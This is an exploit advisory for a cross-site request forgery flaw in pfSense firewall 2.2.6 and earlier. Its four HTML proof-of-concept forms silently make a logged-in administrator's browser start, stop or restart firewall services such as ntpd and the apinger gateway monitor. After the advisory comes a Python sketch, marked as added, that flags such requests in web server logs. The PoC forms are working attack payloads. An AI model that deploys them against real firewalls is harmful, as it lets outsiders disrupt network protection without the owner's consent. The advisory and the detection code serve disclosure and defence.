# Exploit Title: pfSense Firewall <= 2.2.6 Cross-Site Request Forgery
# Exploit Author: Aatif Shahdad
# Software Link: http://files.nyi.pfsense.org/mirror/downloads/old/pfSense-LiveCD-2.2.5-RELEASE-i386.iso.gz
# Version: 2.2.6 and below.
# Contact: https://twitter.com/61617469665f736
# Category: webapps

1. Description
An attacker can coerce a logged-in victim's browser to issue requests that will start/stop/restart services on the Firewall.

2. Proof of Concept
Log in to the Web Console, for example, http://192.168.0.1 (set at the time of install), and open the following POCs:

Start NTPD service:

<html>
  <body>
    <form action="https://192.168.0.1/status_services.php">
      <input type="hidden" name="mode" value="startservice"/>
      <input type="hidden" name="service" value="ntpd"/>
      <input type="submit" value="Submit request"/>
    </form>
  </body>
</html>

Stop NTPD service:

<html>
  <body>
    <form action="https://192.168.0.1/status_services.php">
      <input type="hidden" name="mode" value="stopservice"/>
      <input type="hidden" name="service" value="ntpd"/>
      <input type="submit" value="Submit request"/>
    </form>
  </body>
</html>

Restart NTPD service:

POC:

<html>
  <body>
    <form action="https://192.168.0.1/status_services.php">
      <input type="hidden" name="mode" value="restartservice"/>
      <input type="hidden" name="service" value="ntpd"/>
      <input type="submit" value="Submit request"/>
    </form>
  </body>
</html>

The service will automatically start/stop.

Note: The NTPD service can be replaced with any service running on the Firewall. For example, to stop the APINGER (gateway monitoring daemon) service, use the following POC:

<html>
  <body>
    <form action="https://192.168.0.1/status_services.php">
      <input type="hidden" name="mode" value="stopservice"/>
      <input type="hidden" name="service" value="apinger"/>
      <input type="submit" value="Submit request"/>
    </form>
  </body>
</html>

3. Solution:
Upgrade to version 2.3 at https://www.pfsense.org/download/mirror.php?section=downloads
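
Detection sketch for the requests shown in the POCs above (an added example, not part of the original advisory and not pfSense code): the forms carry no method attribute, so they submit as GET and the mode and service values land in the web server access log, where a request whose Referer is missing or points at another host stands out from clicks made inside the GUI. The Combined Log Format, the firewall host set and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Modes taken from the PoC forms in the advisory.
STATE_CHANGING_MODES = {"startservice", "stopservice", "restartservice"}

# Assumption: the GUI web server writes Combined Log Format; adjust if it does not.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

def suspicious_service_requests(lines, firewall_hosts):
    """Return service start/stop/restart requests whose Referer is absent
    or names a host other than the firewall GUI (firewall_hosts)."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        query = parse_qs(url.query)
        mode = query.get("mode", [""])[0]
        if url.path != "/status_services.php" or mode not in STATE_CHANGING_MODES:
            continue
        ref_host = urlsplit(m["referer"]).hostname  # None for "-" or empty
        if ref_host in firewall_hosts:
            continue  # request originated from a page served by the GUI itself
        findings.append({
            "time": m["ts"], "client": m["ip"], "mode": mode,
            "service": query.get("service", [""])[0], "referer": m["referer"],
        })
    return findings

# Constructed sample log lines (not taken from a real system).
SAMPLE_LOG = [
    '192.168.0.50 - - [10/Feb/2016:10:01:02 +0000] "GET /status_services.php HTTP/1.1" 200 5120 "https://192.168.0.1/index.php" "Mozilla/5.0"',
    '192.168.0.50 - - [10/Feb/2016:10:01:09 +0000] "GET /status_services.php?mode=restartservice&service=ntpd HTTP/1.1" 200 5120 "https://192.168.0.1/status_services.php" "Mozilla/5.0"',
    '192.168.0.50 - - [10/Feb/2016:10:03:41 +0000] "GET /status_services.php?mode=stopservice&service=apinger HTTP/1.1" 200 5120 "http://example.invalid/page.html" "Mozilla/5.0"',
    '192.168.0.50 - - [10/Feb/2016:10:04:12 +0000] "GET /status_services.php?mode=stopservice&service=ntpd HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in suspicious_service_requests(SAMPLE_LOG, {"192.168.0.1"}):
        print(finding)
```

A missing Referer is flagged as well because browsers and referrer policies can strip it, so treat those hits as leads to correlate with the service's own start/stop log entries rather than as proof.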